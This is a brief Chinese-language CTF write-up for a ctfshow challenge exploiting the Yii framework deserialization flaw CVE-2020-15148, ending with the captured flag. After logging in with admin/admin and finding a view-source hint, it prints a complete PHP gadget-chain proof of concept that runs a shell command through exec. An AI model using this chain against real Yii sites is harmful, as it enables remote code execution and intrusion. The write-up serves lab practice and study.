PHP/7.3.11框架审计CVE-2020-15148Yii登录前
    弱密码 admin/admin 登录
    about 页面有个 <!--?view-source --> 提示
    可以通过 index.php?r=site%2Fabout&view-source 查看提示
    这是 Yii 的路由规则,传送门 ,咋知道的 Yii?通过 burp 抓包记录看到很多 yii.js php 搜了下 (
    image.png

    框架反序列化漏洞,网上应该可以搜到,一个不错的复现和挖掘文章,传送门

    poc

    1. <?php
    3. namespace yii\rest{
    4.     class CreateAction{
    5.         public $checkAccess;
    6.         public $id;
    8.         public function __construct(){
    9.             $this->checkAccess = 'exec';
    10.             $this->id = 'cp /fla* tari.txt';
    11.         }
    12.     }
    13. }
    15. namespace Faker{
    16.     use yii\rest\CreateAction;
    18.     class Generator{
    19.         protected $formatters;
    21.         public function __construct(){
    22.             $this->formatters['close'] = [new CreateAction, 'run'];
    23.         }
    24.     }
    25. }
    27. namespace yii\db{
    28.     use Faker\Generator;
    30.     class BatchQueryResult{
    31.         private $_dataReader;
    33.         public function __construct(){
    34.             $this->_dataReader = new Generator;
    35.         }
    36.     }
    37. }
    38. namespace{
    39.     echo base64_encode(serialize(new yii\db\BatchQueryResult));
    40. }

    image.png
    image.png
    flag
    ctfshow{438357ca-1233-4742-b986-f8672d27a08b}